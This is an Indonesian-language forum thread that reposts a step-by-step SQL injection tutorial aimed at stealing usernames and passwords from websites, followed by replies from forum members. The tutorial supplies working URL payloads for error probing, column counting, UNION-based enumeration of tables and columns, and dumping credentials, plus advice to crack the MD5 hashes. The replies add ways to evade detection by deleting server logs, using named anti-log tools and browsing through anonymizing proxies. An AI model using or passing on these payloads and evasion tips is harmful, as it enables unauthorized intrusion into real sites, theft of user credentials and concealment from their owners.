sql injection(mencari pasword & username suatu web dan data penting lainnya)

di postingan kali ini akan saya terangkan step by step bagaimana hacker menyusup ke dalam sistem dan mengexploitasi hole dengan sql injection

http://(target).com/path/newsdetail.php?id=15(untuk alamat bisa anda cari sendiri tergantung kreatifitas)
langkahnya:

1. cek dulu apakah website tuh error sqlnya?
http://(target).com/path/newsdetail.php?id=15' (tanda (') adalah untuk mengetahui apakah web target error sqlnya or tidak)
jika muncul kalimat You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY `date` DESC' at line 1 berarti web target sqlnya error or kalimat yang lainnya yang menunjukan sqlnya tuh error.

2.kita cari column dengan perintah order by..
order by kita gunakan untuk mengurutkan column, jadi jika perintahnya order by 5, maka column yang pertama muncul diurutkan dari column ke-5..atau dalam kata lain kita mencari batasan dari kolom table(menebak2 angka)
misalnya pada target kita ini saia pake http://(target).com/path/newsdetail.php?id=15%20order%20by%207--
ternyata muncul pesan Unknown column '7' in 'order clause'

lalu coba lagi http://(target).com/path/newsdetail.php?id=15%20order%20by%206--
muncul pesan yang sama juga

anda coba lagi dengan http://(target).com/path/newsdetail.php?id=15%20order%20by%205--
website dalam keadaan normal kembali..
intinya disini target menggunakan 5 colomn.

3. sekarang kita lakukan perintah union select diakhiri urutan column dari pertama sampai terakhir, gunanya untuk melihat di angka mana kita bisa lakukan injeksi..
jangan lupa tambahkan tanda "-" diawal angka parameter id, contohnya http://(target).com/path/newsdetail.php?id=-15
dalam prakteknya kita ketikan http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,2,3,4,5--
akan muncul "angka ajaibnya"misal 2 dan 3, disitulah hole yang memulai para hacker untuk melakukan injeksi
selanjutnya melihat versi database,sebelum mencari versi database kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya..

4.@@version adalah command untuk melihat versi database.. bisa juga dengan menggunakan perintah version()..
dalam prakteknya http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,@@version,3,4,5--
maka di web target muncul 5.0.27-standard-log menandai bahwa web target menggunakan database versi 5.

5.selanjutnya mencari table dari information_schema dengan memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--
dalam prakteknya
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,
group_concat(table_name),3,4,5%20from%20information_schema.tables
%20where%20table_schema=database()--
jika berhasil maka akan mucul table misal...artists,members,news,newscomments,videocomments,videos

6.sekarang kita akan mengintip informasi di dalam table members, pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'
dalam prakteknya
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,
group_concat(column_name),3,4,5%20from%20
information_schema.columns
%20where%20table_name=%27members%27--

error!
table 'members' harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..
untuk menconvertnya kita tinggal ketikan text to hex convert di google
setelah di convert kata members ke hexa menjadi 6d656d62657273

7. setelah mengkonvert lakukan perintah ini nih..

http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,
group_concat(column_name),3,4,5%20from%20
information_schema.columns%20where%20table_name=0x6d656d62657273%20%20--

jika berhasil akan muncul username and paswordnya dari table members...
misal id,username,password,f_name,l_name,email,dob,sex,address,city,country,aboutme,profilepicture,active_usr,random_usr

8. perintahnya: group_concat(username,0x3a,password) tambahkan diakhir URL from members
dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from members adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama members..
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,group_concat
(username,0x3a,password),3,4,5%20from%20members--

viola data has been hacked
sekarang kita akan login sebagai members, namun user members telah terenkripsi dengan MD5
maka anda harus mengkonvertnya ke text bisa anda cari di google "How to Descrypt MD5"

note:%20 = spasi

last edited 10 nov by viyancs

referensi : http://viyancs.wordpress.com/2010/11/10/sql-injectionmencari-pasword-username-suatu-web-dan-data-penting-lainnya/

wew ...........ngeri ah

hi.................atut................
dah coba belum sop.....
ane ajarin yang kaya gituan donk.....

twinkblack wrote:hi.................atut................
dah coba belum sop.....
ane ajarin yang kaya gituan donk.....

hhmm ane dapat tutorialnya trus ane penasaran gituu..ternyata setelah ane praktekin ..ya uth hasilnya...

manteplah..........

ada yang mo nyoba...?

boleh jg sih........

wah sql injection mah uda biasa........

wew hebat ah zuzi katna dah biasa......

bro tu kan cara masukna, lah sekarang yang jadi masalah adalah kalo kita dah berhasil masuk dan ingin menghilangkan jejek biar ga ketahuan sama pemilik gimana carana
kalo katahuankan berbahaiiiiiiiiiiiiiiiiiiiiiiya...
misal ni OS&versi SQL dia 5.0.32-Debian_7etch8-log

tinggal hapus aja log file nya. atau jg bisa gunain utility semacam : su.pl, guru-antilog.sh, ssheater-1.1.tar.gz

wewewewe.........
mba suzee pinter cuy....

wew kyne dah sering nyoba yah zuz....
kasih penjelasan yang detail atuh....biar yang lainnya tau....
sekalian yar q ga usah muter2 browser.

[quote="suzee_tkj2"]tinggal hapus aja log file nya. atau jg bisa gunain utility semacam : su.pl, guru-antilog.sh, ssheater-1.1.tar.gz[/quote]
tu masih bisa kedeteksi jika komputr serverselaku container menggunakan perintah netstat dan akan muncul ip yang terhubung ke komputer server...nah dari situ si admin yang dirugikan akan mencoba mencari letak ip computer tersebut dimana milik siapa dan dari isp mana...dengan cara menghubungi IANA(internet Assigned Numbers Authority) Iana bertanggung jawab terhadap keseluruhan manajement dan koordinasi dns serta delegasi nama domain didunia.

[quote="twinkblack"]wew hebat ah zuzi katna dah biasa......

bro tu kan cara masukna, lah sekarang yang jadi masalah adalah kalo kita dah berhasil masuk dan ingin menghilangkan jejek biar ga ketahuan sama pemilik gimana carana
kalo katahuankan berbahaiiiiiiiiiiiiiiiiiiiiiiya...
misal ni OS&versi SQL dia 5.0.32-Debian_7etch8-log[/quote]
gunain aja proxy www.anonymouse.ws dimana jika kita browsing menggunakan anonymouse yang akan tercatat di ip server adalah alamat ip anonymouse bukan alamat ip kita alias tidak mencatat gerak-gerik or tingkah laku kita dalam berinternetan ..
dan ada lagi nih www.securitywire.com
www.proxify.com

Hehhehehehe....
Pada heran ya???